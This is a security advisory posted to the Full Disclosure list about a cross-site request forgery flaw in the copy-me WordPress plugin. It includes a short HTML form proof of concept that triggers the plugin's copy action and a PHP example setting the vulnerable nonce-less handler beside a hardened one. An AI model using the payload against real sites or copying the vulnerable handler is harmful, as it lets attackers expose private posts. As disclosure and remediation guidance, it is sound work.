Date: Wed, 21 Dec 2016 19:55:34 +0000
From: dxw Security <>
Subject: [FD] copy-me vulnerable to CSRF allowing unauthenticated attacker to copy posts (WordPress plugin)

Software: copy-me
Version: 1.0.0
Advisory report:
CVE: Awaiting assignment
CVSS: 4.3 (Medium; AV:N/AC:M/Au:N/C:N/I:P/A:N)

copy-me vulnerable to CSRF allowing unauthenticated attacker to copy posts

This plugin does not use nonces, so its copy action can be triggered by a cross-site request. Copying posts could allow an attacker to take a secret post from a non-public site within a multisite installation and move it to a public site.

Proof of concept
Click submit and it’ll copy post with ID 1 to blog/site with ID 1:
<form method="POST" action="http://localhost/wp-admin/admin-ajax.php">
  <input type="text" name="action" value="copyme_copy_item">
  <input type="text" name="id" value="1">
  <input type="text" name="target" value="1">
  <input type="submit">
</form>

Disable the plugin. No fixed version is known.
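The following is an added example, not code from the copy-me plugin or from dxw. It shows the pattern the advisory describes (an admin-ajax handler that acts on a POST without a nonce) next to a hardened handler that checks a nonce with check_ajax_referer(), checks capabilities on both the source post and the target site, and is only registered for logged-in users. The action name copyme_copy_item and the id and target parameters come from the proof of concept above; the function names, the capabilities chosen and the copy routine are assumptions.

```php
<?php
/*
 * Added example, not the copy-me plugin's own code. Only the action name
 * "copyme_copy_item" and the "id"/"target" parameters are taken from the
 * advisory; function names and capability choices are assumptions.
 */

// --- Vulnerable pattern (as the advisory describes it): no nonce, no
//     capability check, so any POST the browser sends is acted on. ---
function example_copy_item_unprotected() {
    $post_id = absint( $_POST['id'] );
    $target  = absint( $_POST['target'] );
    example_do_copy( $post_id, $target );
    wp_die();
}
// add_action( 'wp_ajax_copyme_copy_item', 'example_copy_item_unprotected' ); // do not register

// --- Hardened handler ---
function example_copy_item_protected() {
    // 1. CSRF: require a nonce bound to this action. check_ajax_referer()
    //    terminates the request (HTTP 403) when the nonce is missing or stale.
    check_ajax_referer( 'copyme_copy_item', '_ajax_nonce' );

    $post_id = isset( $_POST['id'] ) ? absint( $_POST['id'] ) : 0;
    $target  = isset( $_POST['target'] ) ? absint( $_POST['target'] ) : 0;
    if ( ! $post_id || ! $target ) {
        wp_send_json_error( 'missing id or target', 400 );
    }

    // 2. Authorisation on the source: the user must be able to read the post.
    if ( ! get_post( $post_id ) || ! current_user_can( 'read_post', $post_id ) ) {
        wp_send_json_error( 'not allowed to read source post', 403 );
    }

    // 3. Authorisation on the destination: in a multisite the target is a
    //    different site, so evaluate the capability in that site's context.
    switch_to_blog( $target );
    $can_publish = current_user_can( 'publish_posts' );
    restore_current_blog();
    if ( ! $can_publish ) {
        wp_send_json_error( 'not allowed to publish on target site', 403 );
    }

    $new_id = example_do_copy( $post_id, $target );
    wp_send_json_success( array( 'new_post_id' => $new_id ) );
}
// Logged-in hook only: no wp_ajax_nopriv_ variant, so anonymous requests
// never reach the handler at all.
add_action( 'wp_ajax_copyme_copy_item', 'example_copy_item_protected' );

// Minimal copy routine (assumed; the real plugin's logic is not on the page).
function example_do_copy( $post_id, $target ) {
    $post = get_post( $post_id, ARRAY_A );
    unset( $post['ID'], $post['guid'] );
    $post['post_status'] = 'draft'; // never auto-publish a copied post
    switch_to_blog( $target );
    $new_id = wp_insert_post( $post );
    restore_current_blog();
    return $new_id;
}

// The legitimate form carries the nonce; a page on another origin cannot
// read it, which is what closes the CSRF.
function example_render_copy_form( $post_id, $target ) {
    ?>
    <form method="POST" action="<?php echo esc_url( admin_url( 'admin-ajax.php' ) ); ?>">
      <input type="hidden" name="action" value="copyme_copy_item">
      <input type="hidden" name="id" value="<?php echo (int) $post_id; ?>">
      <input type="hidden" name="target" value="<?php echo (int) $target; ?>">
      <?php wp_nonce_field( 'copyme_copy_item', '_ajax_nonce' ); ?>
      <input type="submit" value="Copy">
    </form>
    <?php
}
```

The nonce check alone stops the cross-site form in the proof of concept, but it does not replace authorisation: the two current_user_can() checks are what prevent a low-privileged but logged-in user from moving a post they cannot read, or publishing onto a site they do not belong to.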

Disclosure policy
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy:

Please contact us on to acknowledge this report if you received it via a third party (for example, as they generally cannot communicate with us on your behalf.

This vulnerability will be published if we do not receive a response to this report within 14 days.


2016-11-01: Discovered
2016-12-07: Reported to vendor via contact form:
2016-12-07: Requested CVE
2016-12-21: Vendor has not responded after 14 days
2016-12-21: Published

Discovered by dxw:
Tom Adams
Please visit for more information.

Sent through the Full Disclosure mailing list